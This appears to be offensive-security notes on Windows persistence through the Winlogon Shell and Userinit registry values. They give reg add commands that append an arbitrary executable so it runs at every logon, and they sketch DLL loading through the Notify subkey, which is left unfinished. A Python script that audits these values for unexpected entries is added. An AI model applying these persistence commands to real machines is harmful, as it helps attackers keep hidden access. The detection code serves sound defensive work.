WinLogon

Winlogon is the Windows component that handles "login" activities such as logon, logoff and loading user profiles. Its behaviour is controlled by registry values, and those same values can be abused for persistence.

Winlogon has two registry values we can use for persistence: Shell and Userinit.

Shell is executed at logon time, and Userinit initializes the user's session; both are launched by winlogon.exe, so anything appended to either value runs at every interactive logon.

Shell

copy c:\executable.exe c:\windows\system32
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Shell" /T REG_SZ /D "explorer.exe,executable.exe" /F

UserInit

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "UserInit" /T REG_SZ /D "C:\Windows\system32\userinit.exe,c:\windows\system32\executable.exe" /F
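Both values above are comma-separated lists, and on a stock install they contain only explorer.exe and C:\Windows\system32\userinit.exe, (trailing comma included). The following added example (not part of the original notes) parses `reg query` output for the Winlogon key and reports any entry that is not one of those defaults; the sample output is constructed to mirror the two modifications shown above. The default sets and the `audit_live_system` helper are assumptions for illustration; hosts with a legitimately custom shell will need their own expected values.

```python
"""Audit the Winlogon Shell and Userinit values for entries beyond the defaults."""
import re
import subprocess

WINLOGON_KEY = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# Expected contents on a stock Windows install (assumption; adjust for custom shells).
EXPECTED = {
    "Shell": {"explorer.exe"},
    "Userinit": {r"c:\windows\system32\userinit.exe"},
}


def parse_reg_query(output: str) -> dict:
    """Parse `reg query` lines of the form '    Name    REG_TYPE    Data' into a dict."""
    values = {}
    for line in output.splitlines():
        m = re.match(r"^\s+(\S+)\s+(REG_\w+)\s+(.*)$", line)
        if m:
            values[m.group(1)] = m.group(3).strip()
    return values


def split_entries(data: str) -> list:
    """Split a comma-separated value; the Userinit default ends in a comma, so drop empties."""
    return [e.strip() for e in data.split(",") if e.strip()]


def find_unexpected(values: dict) -> dict:
    """Return {value_name: [entries not in the expected set]} for Shell and Userinit."""
    findings = {}
    for name, expected in EXPECTED.items():
        data = values.get(name)
        if data is None:
            continue
        extra = [e for e in split_entries(data) if e.lower() not in expected]
        if extra:
            findings[name] = extra
    return findings


def audit_live_system() -> dict:
    """Query the local machine (Windows only) and audit the result."""
    proc = subprocess.run(["reg", "query", WINLOGON_KEY], capture_output=True, text=True, check=True)
    return find_unexpected(parse_reg_query(proc.stdout))


# Constructed sample output reflecting the Shell and Userinit modifications shown on this page.
SAMPLE_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    Shell    REG_SZ    explorer.exe,executable.exe
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,c:\windows\system32\executable.exe
    AutoRestartShell    REG_DWORD    0x1
"""

if __name__ == "__main__":
    print(find_unexpected(parse_reg_query(SAMPLE_OUTPUT)))
```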

Notify

The Notify subkey exists on older versions of Windows and points to notification package DLLs that handle Winlogon events. We can add DLL entries under this key to have them loaded during logon.

(todo)
